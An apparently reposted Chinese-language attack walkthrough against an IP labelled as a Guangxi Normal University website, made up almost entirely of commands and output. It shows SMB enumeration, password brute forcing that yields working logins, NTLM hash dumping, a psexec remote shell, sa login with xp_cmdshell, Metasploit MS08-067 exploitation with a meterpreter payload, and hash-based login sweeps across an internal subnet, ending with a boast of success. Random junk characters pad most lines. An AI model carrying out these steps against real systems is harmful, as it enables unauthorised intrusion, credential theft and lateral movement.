广西师范网站http://202.103.242.241/. u0 P$ k) P7 _! m O! }$ |
2 W8 a2 S6 Y$ D3 Y. ?, Yroot@bt:~# nmap -sS -sV 202.103.242.241
! d' ?. y& i: v" ]6 D+ b! ~
8 q9 `: K7 |8 u0 XStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
3 u8 {4 u0 i8 ~7 `' W! u6 Z% }+ C# P! h
Nmap scan report for bogon (202.103.242.241)% T- A+ d( n/ e: x) z5 p& t8 v! T
, J9 Q3 q1 @* w' C5 t% T+ `& yHost is up (0.00048s latency).
' {* {; p0 S" E' K9 c" a& j
% o3 J" V8 E+ ~Not shown: 993 closed ports+ }) i7 t4 q% `1 j0 s ^; L6 g
+ y' }0 H U5 V' @& Y7 I; J6 y, `
PORT STATE SERVICE VERSION" s* z/ J& J1 S9 E' L
, B0 B5 }% E; ^2 h% P3 D7 C
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)$ ]& V5 T F( f& P0 p
: o" h( x/ b8 e% m# Y139/tcp open netbios-ssn8 A4 C2 {, [3 `" y3 A' _
T1 x. v1 v4 d, I5 y! W8 k6 L445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds- C1 F# s q/ k( j" x/ t! y
) d' \" e: S5 y
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
# W9 }5 m* T7 X G. J9 S/ T# f0 g8 j' E, w+ D2 N( n" U
1026/tcp open msrpc Microsoft Windows RPC
2 O9 h& n7 Z: P$ |* W2 r" y# T2 @# e7 ^) z) d: {4 B
3372/tcp open msdtc?
# p* g) H) T/ {
: g4 C" e& @, F; t6 O3389/tcp open ms-term-serv?* n' u; q e! A0 X0 F( J+ V
: i, h4 |& J8 N1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
/ O9 U+ m A# u# j5 n4 h5 u2 VSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
/ m8 J& J- i1 P1 T3 z6 z' Q+ u& [; g/ Q C$ ^7 v
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
. s5 i9 g5 i5 I* d9 z, N# d; G5 t$ d; T- N8 X. N% X) S
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
2 I, f8 ?8 b( R2 v* }! V9 ?$ Z9 G9 s4 _) H0 n% L
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO1 V0 Z+ \& A5 r O' i2 B
. b, Y2 P }: `: ?8 t0 g2 Z( I
SF:ptions,6,”hO\n\x000Z”);
* U4 C% |' O* B9 t! D* D Q! x% @2 j' g f7 y
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)6 @% z( M% \* K- [( E' U
" M, o; o. @: Y3 }/ a
Service Info: OS: Windows
0 h; d: \" y1 }9 i. o
& ^3 |* M3 \# l/ QService detection performed. Please report any incorrect results at http://nmap.org/submit/ .
0 N& D0 z- q, H8 i1 Y: j& G1 C: |$ R# Y* i3 J
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds" L% W1 w/ h2 ` }: Z# e6 L6 x5 V
, Z; b" ?, h, g F2 _4 g& r
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本; \" M- Y# J$ W& b
* M7 X& ]0 Q- j" H" d
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse4 F" A: M8 @- u7 h* H
0 t8 o$ m/ R2 t-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse `+ { H5 Q2 R- Z& E! z W$ @
) ?8 C& H! o: ~5 x- m
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse- G9 l' H Z9 M
2 U# U! x- b2 X0 L# \ x
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
) u* `5 o; x2 p' Z* ?" c; B
8 m- k$ w4 {+ O/ @-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse: c! S! l7 S K3 f; n4 S
0 B" K& i7 W) ~) u
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
$ h5 o- S# e+ m+ e6 d' j" Q6 l- f, ~3 F/ V8 ?+ {
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse D3 \# G) l3 O, x- y
4 C o2 P5 v5 j) r( Y) t1 J0 a H
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse1 F b, S8 o( x# R0 _- M4 p
: Y. z( ?0 N! P3 V; J) B$ F" z-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
& Z9 N4 x2 Z0 {7 O7 o1 X+ q7 ^& w6 g* W1 K K1 D
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse0 k+ D* h/ Y) b3 w
9 i) ] |' F9 G. }$ n8 V-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
8 S$ `4 ~* `7 u4 Y! p" ~3 y8 o% t N* w8 l% Y- C
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
5 ]4 B& O5 q9 V% Y: S% P% S$ w) E+ B4 X/ a2 J
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
2 o! m4 ~+ ?! h( C1 @5 K% E. x0 @6 u. F# l, x. ] t, J
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
. Z. N# f/ M/ y$ c. v3 H( Y; K% N T! j, C
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
8 f) w. Y- B/ t3 z; O
9 y: |/ g3 e+ L g0 V( l Croot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 $ L9 j' a, B% m: F: J% j3 ?
r+ E! S; Q7 p' ^4 \, B
//此乃使用脚本扫描远程机器所存在的账户名9 \. A6 X. b |. f
! _: e+ g( \# ?3 F4 z
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST! b/ V3 ? j: @. b+ {* q
: Q/ e5 c8 h7 C( }5 f
Nmap scan report for bogon (202.103.242.241)
& ~# U/ f0 x a! |$ r7 d- y, E/ L" V5 v! i3 d1 P. R1 @
Host is up (0.00038s latency).% v T/ C( I+ C
: O9 }8 e" _; s8 uNot shown: 993 closed ports
! b* ?+ n: m+ f# o
9 I; b7 F# `2 W5 A5 }! k# G" VPORT STATE SERVICE
+ j0 E1 P2 n1 K) {' H# v
; E# Z4 q# K! ^0 |/ {135/tcp open msrpc6 z4 V K, T0 h2 x7 z* S) H3 P$ A
/ d) d6 M/ ^3 e5 G- e1 @+ v139/tcp open netbios-ssn1 c: b+ ]" [- `5 u! S4 A" `" ]/ T' {
- p9 Z& l; H8 q: F) m: t445/tcp open microsoft-ds
/ U. M/ l2 M3 `+ F
% N& D: N( y& B! Z1025/tcp open NFS-or-IIS& X- }. v; [: z) c; X% i7 w
- j: I2 l8 I+ y6 Y" j1026/tcp open LSA-or-nterm
# p5 C* J& v0 ?0 e; ]/ }% N, l3 j' F+ v9 L0 z% J( S0 `, ?8 G9 D! F
3372/tcp open msdtc. }- m, L: K. i/ i/ P( R
) X7 B L" j& z4 g8 s" V( j
3389/tcp open ms-term-serv" F: E, t* T6 z' R, ~3 i Y( V
% i! |! x* w( d7 a$ JMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
1 ^& ^( j6 T) O9 n) R; H- x7 h7 O7 v2 W3 j3 |/ d
Host script results:
3 v- M/ M* S, Z
1 A1 q0 v# f; c% V X% y, e: K| smb-enum-users:2 B# A e9 D0 o4 u% `" F6 Y* {
+ w: j Z& m: g0 y n: u; u9 `8 z8 k( @|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
4 u* e8 I! \; l- |, a4 \. J/ i2 i9 B( F; A; _5 N+ ~! x9 _
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
0 j' t% V- I$ D! c) w; S5 n2 _8 s
* ^5 N$ k- Q* }& F" s3 O" I$ h. u. _root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
% X* y# R) ]. A( \) K2 ^3 P+ y) \, m; B7 {0 e1 X4 r3 f6 h& |* {1 `
//查看共享/ U4 n* a% U: D8 k" R. G# l
2 c2 }* v5 i% @6 T6 UStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
5 I% l: L+ y0 j* `- ], L: ~" K: |) V8 L. Y# T
Nmap scan report for bogon (202.103.242.241)
1 @ J# G( }0 Z, E5 m6 Q4 t/ E2 Z! k5 z* h4 E: a) W4 t
Host is up (0.00035s latency).! X: G+ U7 }. E6 p* `
9 p" D3 R) ~3 P! ]. c! I, ?- k
Not shown: 993 closed ports
) e' r# }) A/ r9 y5 @& L% q. X# R* t
PORT STATE SERVICE; Q& Q1 ^8 X3 A, ~' E4 ^
8 n2 o, w# z+ t# @% y135/tcp open msrpc
1 [; }0 N1 C: e; Y# R+ Q& h) k$ Z8 |8 `7 t; d* V
139/tcp open netbios-ssn7 m: ]' S6 t' |1 C" h
7 T6 w7 H7 O2 d& @5 { ]2 _
445/tcp open microsoft-ds
$ ~- X w6 a4 q9 X! y- ~) ]0 k; K6 }& S0 ~
1025/tcp open NFS-or-IIS* |1 x$ M, T0 p3 H+ w$ g0 u( B
5 i F, [* z" D1 ~% ]7 }3 R1026/tcp open LSA-or-nterm) a5 z1 m ?1 S3 N! }/ V% A
) j' R/ W8 H5 s! |% |
3372/tcp open msdtc
! |' F" x, b) z n7 u" y" V* X N
8 w l7 ~, x0 a2 k1 n3389/tcp open ms-term-serv
) Y1 [4 l- j L% ]) H7 r0 \3 M# j' g" h
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)5 o `8 b; I' E4 ~1 X3 p& x5 O1 P w
% \# K1 v/ ]. t+ I: C
Host script results:
/ u( v; |, H- D$ I; c. ^; T0 I2 f3 [* r& X) H0 n8 H+ O5 J
| smb-enum-shares:
! _% ?5 l% _2 o& u
- `- F/ h: Z; {) B/ U| ADMIN$' Y/ }# J. ]1 z8 M
- ~" O E/ m q$ t
| Anonymous access: <none>+ E0 _! |! f; F$ ?
]& K$ |. A' W$ O| C$
3 W, g X7 c- j+ m- R% M9 I: J' H' q/ T3 b
| Anonymous access: <none>
) {& u0 h( E' l
6 o) C& _) t( I& T| IPC$
; h ^5 U- h! s& f- _( p5 v( p0 C3 ^4 s/ Q9 a' [5 D, |) r
|_ Anonymous access: READ3 Y- o! L: ^' n3 u& k4 w1 R
; d! R+ @8 @* L e1 W, j/ v" mNmap done: 1 IP address (1 host up) scanned in 1.05 seconds
& i1 E; w: b" j2 w% i# r/ w; f4 I0 \$ s( W# I
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
" O5 B; l! H8 p. u& v
: K' A: V4 d$ B+ |! I6 L//获取用户密码- c, _2 K1 `, g' Y6 B) R, T
* g4 h/ ?, ]9 U, K) yStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
+ j+ ]4 _1 @. O3 l" y- }$ f" d( m6 d! R# w, E5 m% s& P
Nmap scan report for bogon (202.103.242.2418)
- ^) H( d$ O& e$ N- E: V- S( s) ?+ g; X% y
' u: }! T: ^0 f3 l7 ~4 E- ~Host is up (0.00041s latency).% Q) \% k7 }( h& i
5 E& p; d9 V# h( y" q9 H
Not shown: 993 closed ports8 B, f. R+ n5 [6 j/ J
/ C/ X, T/ ^. S2 j4 ?PORT STATE SERVICE
$ J6 u/ h5 g0 ^" G# L- B
8 h7 f* [+ I7 H/ l( R O5 |135/tcp open msrpc
- e* R3 `% r. j
{/ o" n" {- T4 H9 T/ R, t139/tcp open netbios-ssn* R& n3 Y8 }3 Z
$ e |$ S, M4 f6 r& t
445/tcp open microsoft-ds1 R6 E4 I' M( Q* }9 o0 h
0 I5 N: {. P l. U, p' K. V1025/tcp open NFS-or-IIS
s& S% T) v# @2 n7 N8 {3 R
5 ]7 f( F- C$ c: N5 J1026/tcp open LSA-or-nterm3 E; t9 I( t5 A* ?% E( ^
- _$ |: H7 W. j0 f$ o7 u( }/ r7 p3372/tcp open msdtc/ ^ J2 f# H' L) U
+ t7 |( f; k! u2 S1 D- v3389/tcp open ms-term-serv
2 K' h; [1 z* m* [% D! P- K7 j" e6 q! s+ u: D. b( i/ H
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)2 S3 d3 O2 _* k/ w) h1 J% H
+ s# c! Y+ g: F2 n
Host script results:& [/ q$ P$ U$ v7 {8 \9 ^1 n
7 o& t8 i2 V: V) c: R, U/ |0 v
| smb-brute:
) P2 N) |9 c/ c1 V" I8 [, T6 X7 t3 n' p
administrator:<blank> => Login was successful
a0 `( G9 f, U. D8 Z& r: x. b( L$ K, i/ R% E6 R
|_ test:123456 => Login was successful) z- y' t& I0 ]- V/ O0 F8 s
! z; o2 H. c/ e
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds4 A2 m4 C1 J8 J- u% T4 I
6 X( d4 l% _& W0 n/ L9 froot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
6 K! K7 A( |5 w2 K! E- J* ?: X7 @/ y! [
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
6 B$ j) K5 G- t9 f
& f* G; F, e: }3 @5 q: mroot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
& V! ]6 P# {# |" |3 [1 f) _1 G
$ G( V0 @1 K! Proot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139+ H. z5 h6 d, p/ d$ f
1 p3 b# h8 X* U1 r; w% |! a" k) V/ AStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST0 N: o+ ~& k/ t" p
3 ~5 _4 `% F) U) p/ w7 m9 q
Nmap scan report for bogon (202.103.242.241)
' S- h K) J5 o) s6 _6 r; T
! a& V6 G& o: r3 [$ r1 THost is up (0.0012s latency).2 X( G9 N" b" m6 H4 B6 f* W1 j! @
# d8 y9 ]. M; j: f) lPORT STATE SERVICE1 q$ X3 v& U4 G1 P
( ?. B0 g A6 h! K) b% i) ^. h
135/tcp open msrpc
' T, g1 ^5 b9 m
: P7 I5 t4 c4 ? z) z6 k1 _139/tcp open netbios-ssn5 i! w% D; e7 K( B( R
& O' q. {9 D& f! h' x
445/tcp open microsoft-ds( L: n$ F: h; ~2 W" A6 U/ o
5 }& s3 T6 o8 ^MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
$ \7 u0 V" X- N. Q( t( A( K& }
8 y$ x6 ^' s- m- J9 YHost script results:1 P0 l4 v& i7 y
, K: h/ P/ T' m$ H% A: V8 N: m$ G| smb-pwdump:
" T2 [0 F7 r1 w" ]5 R9 W, o8 l/ s+ v7 x d; d2 K
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
) v7 H4 X$ h/ V6 I) H9 b4 O9 N+ d2 e8 |9 H" u' u# K
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
) U9 v$ Z, S- K( b. ]. s( H
: O3 d, @; E/ B- U| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4. S2 u4 a" C5 ~3 k
$ u) m; j2 S0 w! q! N9 \2 V$ P) x
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
' Y( n# s: M, b$ |+ W8 ?+ h* p3 R: D& [9 |6 q) u6 W7 E! ^5 p
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds3 o, F- |" h$ x% {
* c( M: G6 ]. J$ w3 u: L
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
# G1 N \2 r/ T) U N c
- A) g2 G# M% q+ d-p 123456 -e cmd.exe/ u+ b: r8 s3 ~9 e. i# Y
8 d; U K# I; B3 D5 ?7 J
PsExec v1.55 – Execute processes remotely8 q" ]% X4 Q+ ^; V/ y
[/ F% _ `' m. l$ PCopyright (C) 2001-2004 Mark Russinovich( s9 e& U1 o* I7 m/ a
! k) y6 i, M. r9 k, kSysinternals – www.sysinternals.com
! n% U% n, F: {0 ]* j2 V# U
8 {* ?6 W. a# G# u. v2 i/ QMicrosoft Windows 2000 [Version 5.00.2195]
, D8 R T# z6 T8 n- m7 }' R! @4 ]
( W% p$ v7 X- B# q, t$ A2 ~7 L(C) 版权所有 1985-2000 Microsoft Corp.8 J' z- B% p8 \4 c9 j* c
- ?" n7 t! B6 A) o; C5 M7 O
C:\WINNT\system32>ipconfig
9 _% p$ R. D* X7 ?2 y7 ~- A; H
Windows 2000 IP Configuration2 L5 S; U# n, `9 V% C8 ]' V- y
* `$ _3 K& N: w" c& qEthernet adapter 本地连接:
0 M5 S1 x+ W$ y& S6 V" F
: b0 |6 g6 p3 v0 l- L( a s( G1 YConnection-specific DNS Suffix . :$ d" L+ g+ k8 [
' e4 c3 \, ~) I3 _, MIP Address. . . . . . . . . . . . : 202.103.242.241
1 \3 Y0 {) F$ |7 J1 h
; H: \6 Z6 Y, _7 X0 s8 x# eSubnet Mask . . . . . . . . . . . : 255.255.255.0
: r% J5 c* [0 A9 Y2 e, @% k2 A; Q
Default Gateway . . . . . . . . . : 202.103.1.1$ `. V( C* m! U# H9 e$ O
, F/ w5 U0 u/ @: M- uC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
/ T9 t; d0 y5 I3 ?; o7 `! j) S+ C, L# e
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞6 ^7 `8 v6 i5 u3 @
' t- W# S6 e! e& d# d
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
- Q4 `$ a" T0 ~8 k' r
& k# N9 w3 s0 E& x$ ONmap scan report for bogon (202.103.242.241)$ w3 g$ U c. `/ R
" C+ U c7 M' P y3 W. h' XHost is up (0.00046s latency).
: W3 P* t! I5 f4 _: t
D% n8 c; a4 g( ^8 {Not shown: 993 closed ports
3 ^" v# D; ]4 d1 c+ k
$ ? a2 C- w. C% K3 O0 a: i: ~PORT STATE SERVICE! f3 [7 s7 i) \; R* n' O6 ~
. u$ H0 \% }, T7 l; h! {& B
135/tcp open msrpc4 {% z" T! E- e6 T
9 ~* ^% S: b8 a2 {2 J
139/tcp open netbios-ssn
; S4 h: \& I) s0 H1 z& j8 y0 y8 Z! W( _$ c" ~! }
445/tcp open microsoft-ds
9 j8 q) L( @, B8 l1 j% z) q2 y( x9 p4 U9 P: u
1025/tcp open NFS-or-IIS
: o; Y7 s: |9 Q) \5 U! K3 ^
$ A5 F9 G4 i5 m7 H8 P6 I( r1026/tcp open LSA-or-nterm- Q+ @) }! F5 T. n! p/ ?1 b, y
' ?- B2 n. i/ f [ X! M$ s. |
3372/tcp open msdtc) Y P; V6 L% E1 `* A, I" N
# m3 G, a! E5 i" U! @
3389/tcp open ms-term-serv3 Q' o0 \: d9 `" `: u
9 _0 Y/ U! x C
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
0 q3 s, I7 L/ v2 ~4 y( A: m4 [5 ?8 r, ~" H
Host script results:' H) s. ^% u6 ~! _: d% r
! l7 g6 Z$ N! U- q| smb-check-vulns:) N* J& Y2 W; l; S' b, S
0 P. T" m2 z$ }6 s6 }/ m r|_ MS08-067: VULNERABLE( n( v' C# t7 H1 c
7 Y) |5 H* O1 D0 G( INmap done: 1 IP address (1 host up) scanned in 1.43 seconds
4 k& I' K) |2 n# e
7 G- e0 y* ~8 m! S' sroot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出5 h& L$ Z" e5 ~* P( C7 F
6 U% N9 I, s5 S% h' ^: Y4 I# p6 _msf > search ms08
$ X7 i0 {5 [4 \+ s0 F- g* f
! D: o# `; \0 u0 E rmsf > use exploit/windows/smb/ms08_067_netapi9 S% I4 Z3 h1 e) g8 [
% s0 `" U) K( B3 ]. nmsf exploit(ms08_067_netapi) > show options
( h! F# j3 _0 d4 U0 G1 @7 M A
1 N6 Z" |7 s9 ^& D7 r) {8 m# Zmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
) ^. R( j! {3 r5 z2 l' h- g+ d3 {- `
msf exploit(ms08_067_netapi) > show payloads
$ }8 S" R% ~6 V2 y! ], |+ P4 |+ K" t, z' u% u2 T. Q4 g
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
7 x0 C& b: p) i! c1 |# C1 O+ n( N* w% t, p- X. A% n+ a
msf exploit(ms08_067_netapi) > exploit
3 g* |9 C* |5 R: W" q+ `
6 }5 l, s* y& E* e' v! Y9 }' y: Lmeterpreter >; |8 V0 D! T$ W, u9 a0 k
. q6 \0 `: [* c: }. l% I+ DBackground session 2? [y/N] (ctrl+z)
7 Q3 j P7 A2 m* C. o
- C( E7 ]4 N# t6 \# J' ?* R# Y& Z: E) Emsf exploit(ms08_067_netapi) > sessions -l2 m+ q" z7 i5 [8 R* f2 s
8 |& u0 n& q2 p: ?/ o+ |8 X
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt0 L! C O! G# H7 {
9 F4 x% W( |5 D1 F4 ^
test8 H( J; U2 l7 O, B/ X, a
4 Q/ w! U& D9 E8 w# t; [; m+ Sadministrator7 B9 i) U1 C' Q* m' J% p: h# u: S/ w
7 N+ \ X1 C# ^; o8 K$ W% Xroot@bt:/usr/local/share/nmap/scripts# vim password.txt _" `$ U" U% z: r. s% [
& y$ `, m9 U- l+ l44EFCE164AB921CAAAD3B435B51404EE; g) A) d" w% Y6 ?1 L
" Q6 u: B7 x+ ~! ?5 I; w$ J6 {' y
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
/ u: Q5 p' g! l7 H
! b7 O& h9 B3 c, I; r' [; r! A9 ?& ] //利用用户名跟获取的hash尝试对整段内网进行登录5 I: m& ~' [: D
' t$ Z& J6 A Y4 ONmap scan report for 192.168.1.105* ^ I$ H. a* }
7 a' n h7 E! l! v+ ^+ A K! SHost is up (0.00088s latency).5 c3 ^# C# c Z/ e Y; ~
+ I A! y* U% D( n) l
Not shown: 993 closed ports0 D2 u1 S( u; r; p4 [
6 C0 o" S1 M# J4 Z2 r/ C aPORT STATE SERVICE0 P3 U7 F+ E; Y
) C- b% u9 { A4 y* E" q
135/tcp open msrpc
7 l5 ^. `/ @4 ?0 _6 b0 A
" l. w# z/ a6 Q139/tcp open netbios-ssn
4 z& f- r5 i( `3 N9 v' a* n Y0 R+ U+ O* f+ ]: U, b/ E
445/tcp open microsoft-ds' @% R) j' m9 |0 S4 W
# n4 [% c4 W( L) q
1025/tcp open NFS-or-IIS
6 U8 t6 P) R" r( E( x$ z. Y \: V% x8 E" K! l
1026/tcp open LSA-or-nterm
& Z. b# C$ H3 b c5 q4 i2 n4 L) C- O8 U* c! F, t* g3 r% M
3372/tcp open msdtc4 l6 \( ?4 K) D3 O7 o
* O2 Z* b1 h: ~; c
3389/tcp open ms-term-serv
C3 t; Z7 `& ]+ u) W- s
+ m6 h- l- D, p* T0 sMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
8 U: C+ [4 t: R4 K2 a; R+ ~8 ` d: u7 a5 l1 T5 R: Q f
Host script results:& R: x3 V; V2 U+ [
9 V# ^7 k3 T+ _/ `& V7 b; s. Q
| smb-brute:
+ S- ^. C, S! c9 |$ o
# S* I' M# r. N1 ?|_ administrator:<blank> => Login was successful! J ~0 [& z j! d& G( F
* K8 ~$ f( v9 P1 M. }
攻击成功,一个简单的msf+nmap攻击~~·
5 H3 \( F* y& Y" ?9 M. x8 |7 i8 ~; u3 \
|